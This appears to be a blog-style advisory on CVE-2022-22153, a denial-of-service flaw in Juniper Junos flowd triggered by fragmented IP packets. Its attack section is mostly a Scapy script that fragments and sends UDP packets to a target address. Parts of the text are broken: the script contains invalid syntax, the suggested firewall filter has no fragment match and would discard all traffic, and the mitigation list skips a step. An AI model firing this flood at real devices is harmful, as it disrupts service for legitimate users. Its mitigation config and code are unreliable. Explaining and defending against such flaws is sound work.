The security of network appliances is critical, especially for devices in enterprise environments. In early 2022, Juniper Networks disclosed CVE-2022-22153, a vulnerability that affects the flow processing daemon (flowd) in Junos OS, specifically on SRX Series and MX Series routers with SPC3 service cards. This vulnerability allows remote, unauthenticated attackers to severely disrupt network performance simply by sending specially crafted fragmented packets.
Let's break down what this vulnerability is, how it can be exploited, and what you can do to protect your network.
CVE-2022-22153 combines two weaknesses
- Insufficient Algorithmic Complexity: The reassembly algorithm struggles with certain types of packet fragments.
- Unlimited Resource Allocation: flowd does not sufficiently limit how much memory or CPU time is spent reassembling IP fragments.
> Affected Platforms:
> - Juniper SRX Series, MX Series with SPC3
> - Junos OS < 18.2R3, 18.3R3, 18.4R2-S9/18.4R3, 19.1R2, and certain 19.2 releases (full details)
Technical Description
Juniper's flowd is responsible for inspecting and processing network traffic. Whenever fragmented packets arrive (e.g., big UDP packets split into multiple IP fragments), flowd must reassemble these before forwarding them.
If more than 5% of the incoming traffic is made up of IP fragments, especially lots of small, random, or overlapping fragments, flowd's memory and CPU consumption rises dramatically. Eventually, this causes:
Packet drops
- DoS (Denial of Service) conditions on the firewall/router
No authentication is needed—this bug can be triggered by any attacker who can send malicious packets to the device.
How an Attacker Triggers the Vulnerability
An attacker simply floods the target Juniper box with a high volume of fragmented IP packets. The key is to send crafted fragments such that flowd has to perform a lot of processing to try to reassemble them.
Example Attack (Python pseudocode)
Below is a simplified attack concept using Scapy to send fragmented UDP packets to a Juniper firewall:
from scapy.all import *
import random
target_ip = "198.51.100.1"
target_port = 450
# Craft a large UDP payload, forcing IP fragmentation
data = b"A" * 500
# Create base packet
pkt = IP(dst=target_ip) / UDP(dport=target_port, sport=random.randint(1024,65535)) / Raw(load=data)
# Fragment the packet: 100 bytes per fragment (5 fragments)
frags = fragment(pkt, fragsize=100)
# Send fragments in a stream
for frag in frags:
send(frag, verbose=)
> Note: In a real attack, the stream would be continuous, randomized, and likely come from multiple distributed sources (DDoS).
Just a few hosts sending fragmented traffic can saturate the target's flowd processing.
- All other traffic passing through the box (including legitimate users and business services) is impacted.
Detection
- Symptoms: Increased latency, CPU spikes, high flowd memory, and dropped packets, especially during heavy (or malformed) fragmented traffic
- Log messages: Flowd is not generally verbose about breakdowns; monitor system logs and flowd process stats
1. Upgrade Junos OS
Juniper released patches; see the official Juniper Security Advisory for fixed versions:
- Use access lists to block or rate-limit fragmented IP packets from untrusted sources, if possible
set firewall family inet filter BLOCK_FRAG term FRAG then discard
set firewall family inet filter BLOCK_FRAG term DEFAULT then accept
3. Monitor Resource Usage
- Proactive monitoring of flowd process stats, and automated alerts on abnormal CPU/memory/pkt drop stats
Conclusion
CVE-2022-22153 is a textbook case of how even high-end security appliances can be crippled by algorithmic complexity attacks. It is both easy to exploit and hard to detect until business traffic begins to suffer. Timely upgrading and limiting access to untrusted fragmented packets is essential.
Further Reading & References:
- Juniper Security Bulletin
- NIST NVD Entry
- Scapy Official Documentation
Timeline
Published on: 01/19/2022 01:15:00 UTC
Last modified on: 01/28/2022 17:55:00 UTC